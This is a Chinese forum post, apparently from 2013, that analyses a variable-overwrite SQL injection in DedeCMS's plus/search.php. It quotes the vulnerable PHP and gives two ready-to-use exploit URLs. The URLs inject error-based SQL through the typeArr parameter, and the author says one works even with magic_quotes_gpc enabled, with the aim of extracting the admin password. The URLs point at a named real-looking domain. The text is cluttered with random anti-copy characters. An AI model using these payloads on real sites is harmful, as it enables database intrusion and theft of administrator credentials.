微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
8 x4 K. b, d1 ` C" ~7 @; O! `作者: c4rp3nt3r@0x50sec.org6 f( Q" M; {4 y
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
/ U* Z& K% B: L% @
( A$ h( h" s( i7 X7 e+ w/ c黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
% y V5 v" V3 w, Q% d
8 z1 G& m( y& C============
! f6 ?. ? G5 R1 w. X5 j& E; ?0 L
( m7 H, J5 b* K" F
3 ?9 L& H, i; Q( E5 R0 g* ]Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. s2 y9 ^$ H8 U& D( p7 G
' o g) |$ q* |( p4 _
require_once(dirname(__FILE__).”/../include/common.inc.php”);
. C7 e/ l2 O q9 Xrequire_once(DEDEINC.”/arc.searchview.class.php”); N% }0 d" C# U5 n; Q1 t0 Y
: Y4 ~! c6 U5 F* j+ Y$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
1 R O' D" J. ?9 W% @& X- L$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;" _$ S/ I# |+ t+ v6 k* g
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;- i9 m8 Y$ G- k0 R( o
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;& a4 d7 n; J: Y- R; x6 c' q& i/ S
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
3 ?# I5 ?' g; J* ~5 |) w3 `" f8 ?) D
7 @! Y0 N; V6 iif(!isset($orderby)) $orderby=”;8 x% f1 E$ R W0 J8 L+ n' v
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);0 |9 A6 ~$ Q9 f# ]0 Z" s& D
/ T6 j4 N- K9 k! X: s ! T4 f6 Y* D8 v9 G7 J- t
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
% J7 W5 q$ Q, P I& |6 Nelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);! h7 z1 N' _: N {( x
- ~8 w+ t P, p7 a
if(!isset($keyword)){
- B2 X1 k" c/ | if(!isset($q)) $q = ”;5 W5 F- c" o7 d' g
$keyword=$q;
6 q+ q9 Z( v: u1 S9 f" {* G* x& j9 e}
! j' K6 ~* f6 s0 B2 ~9 w6 z) F3 H7 o' _& K
, G* Y4 F3 S [9 D, N [) ~& }+ f" d$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));4 w! i+ o- u2 b" t% X5 J. W- M
1 D# i( W2 o1 H, |4 x& c# B3 Y$ U5 P//查找栏目信息
. ]& n& K6 j) B9 c- @if(empty($typeid))
1 t8 b. X0 E+ k6 j: ^9 v{" {5 d& o1 u2 Z& e. _3 c
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
1 ?& [0 j- q1 ^; l8 {( g if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
" G# [- ^8 E2 a! T' j& v {. I' F4 L' w; v4 b2 W- R! D: H8 ~
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
1 G1 }6 v5 ~# M% Z( Q% m* K fwrite($fp, “<”.”?php\r\n”);9 T1 ~* v8 I+ I' J) L) x
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);# w; m3 X! r3 Z. B& O
$dsql->Execute();
+ z: w" F! P0 h4 L; C& n while($row = $dsql->GetArray())2 o* a* s Z1 F7 K1 I
{2 [: `# N: A" F9 p
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);( W4 m$ C: u6 K- N( O( @2 E6 T
}
) a# h; m( z7 w; G8 u P& |4 E fwrite($fp, ‘?’.'>’);9 o) g+ V' c, `
fclose($fp);
' J) M' R- L1 T, x }6 U1 \. x, ^7 l5 i/ }
//引入栏目缓存并看关键字是否有相关栏目内容# @* y% b# T) n; Y0 s0 T( Q
require_once($typenameCacheFile);% g0 k& z5 w* S" x2 H
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个* @# S+ o% D- {2 c4 {$ F
//
5 Y% Z3 |, P" f- Y+ l3 o if(isset($typeArr) && is_array($typeArr))
+ _( a6 ]0 ]( p5 ]3 |1 S0 P {
/ u+ U" s0 V; m foreach($typeArr as $id=>$typename)
* B8 v8 U* k" Y2 G6 v {
$ z' z% |- u6 k9 N) J- Y" m 1 L' M' w" w( r. G( L) G: [
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过9 L* z# T, w1 U* f; |
if($keyword != $keywordn)8 M0 D$ {1 ?& Q' O4 l% N- R4 h
{3 U* T. B+ C" t4 Q
$keyword = $keywordn;1 v) u" g C5 j- K& \9 D
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
/ k+ b3 i- j9 Q7 Y break;6 d4 a' `( m; Y) _6 u: H! M
}# l' R6 \" d8 o2 @" y5 J
}
* ?0 c! v8 u( n, W% }4 A6 o2 ? }
* s1 @/ }' B, [$ H( @2 F} s3 v4 }% z; U' s9 L" @$ m) d% W! `
然后plus/search.php文件下面定义了一个 Search类的对象 .) L. O) K/ q _' n5 L
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.0 Z# `0 n3 i% }# n+ p) u" u
$this->TypeLink = new TypeLink($typeid);
/ P1 u6 D$ p7 W 0 K4 X! L, z+ n* _+ N
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
7 A0 P' i6 Y6 g
: e: c1 Z* l* n: f0 Lclass TypeLink
/ |$ `6 K* n$ M{
* N6 i+ Z B; @2 [; l var $typeDir;
. [5 K. y5 z6 V8 o# d9 f2 n- _ var $dsql;! P: k. \8 L( ~0 N
var $TypeID; a( r+ F: I# A1 G6 y
var $baseDir;
4 a6 O- u2 b1 b var $modDir;
. M" i9 M8 N& R, X var $indexUrl;
0 |4 f* V" e: b8 l; X var $indexName;
6 u' r3 U- q; X$ k7 x, [ var $TypeInfos;/ B# W, s% j# T$ ?1 T! m9 L- m+ ?
var $SplitSymbol;/ v$ o) u1 \& H- B9 t- W
var $valuePosition;8 b2 K5 t- h' s$ d9 ^
var $valuePositionName;
9 `) K! z( s f) c; I" F var $OptionArrayList;//构造函数///////* R: J2 E' f. f8 Z2 i5 v0 ~% b
//php5构造函数
" a3 t6 Y8 b8 n% K o5 {6 k function __construct($typeid)- V( }+ d1 S; }) u& g
{
- B# q& l6 f: }: k# k $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];, L. c% J e; {) R
$this->indexName = $GLOBALS['cfg_indexname'];
# Y! L! B+ X0 z9 a. n* n $this->baseDir = $GLOBALS['cfg_basedir'];4 u" b6 }% x0 |" a1 T
$this->modDir = $GLOBALS['cfg_templets_dir'];
9 {0 ^; R% `7 K) Q7 H6 t5 B $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
' E5 D2 c/ K+ p/ A $this->dsql = $GLOBALS['dsql'];+ H. t6 F; ?1 t+ z8 I
$this->TypeID = $typeid;
- o/ c+ F) L. Q $this->valuePosition = ”;
0 @1 ]' _# R6 a# j: e6 |% E9 i7 T $this->valuePositionName = ”;
! r/ l% e L+ j. [" i, W4 C5 ~ $this->typeDir = ”; b( r6 u) m: k+ {
$this->OptionArrayList = ”; v/ J- X* m" Q
: y% E; {+ N; s1 R0 K4 i) }2 ]* h //载入类目信息; F% ]' m- h' Z
# C% ~& A7 q; l9 F% b <font color=”Red”>$query = “SELECT tp.*,ch.typename as
1 U% ~0 b( L: H- y# b- p' w1 \- a7 \ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join) Y m* o, h8 A& I& g, N5 M
`#@__channeltype` ch
" K0 _( |" a) J* S on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿5 Q5 o- B! s5 i( G2 E5 _
0 A5 W8 x: R7 l M! l if($typeid > 0)) D( L s9 K* v4 U6 [& |
{
' |% z+ r% z" s0 ~+ m7 n $this->TypeInfos = $this->dsql->GetOne($query);* E4 g" X' {7 I+ g! J
利用代码一 需要 即使magic_quotes_gpc = Off
2 n: V3 `: @3 j# A) o2 T8 ? . B+ c r+ J# P, y( F l
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title- b; @, ]/ y, j: _. r% r' v5 E# c
: U$ r* S& B5 Q! c这只是其中一个利用代码… Search 类的构造函数再往下- I- }) a8 d# d- Q5 d$ D
- o, s2 @2 R( M2 @……省略
% n+ @: d0 c4 X L+ S' x$ B( C3 Y$this->TypeID = $typeid;, b' U1 [% X: z! w, z
……省略
! }8 T# H) P& v# ?2 h4 _0 Qif($this->TypeID==”0″){
" K* o v5 M0 L. b1 F9 Q& H $this->ChannelTypeid=1;
' ?4 i% A4 V# ]% P* o0 @: s }else{4 D6 i" Z# \1 b8 ] _
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲/ L5 g! U6 t4 x0 d; e
//现在不鸡肋了吧亲…
5 [6 I: v1 z6 _& @) |/ x7 z $this->ChannelTypeid=$row['channeltype'];3 t8 v5 V- I4 _1 G6 A
1 V. p* Q. R/ e! h4 R/ U
} V( }5 e+ y0 @/ [3 R/ Y
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.0 {/ d- z4 ?# D# z
4 M; n6 E& o& T5 K* d, ]0 ]www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
8 J4 j" d# @4 {/ ?3 `
! ^3 M& V5 x! J% q# `6 q如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
b( S# s Q2 H3 V! U |
发表于 2013-1-19 08:18:56
收藏
支持
反对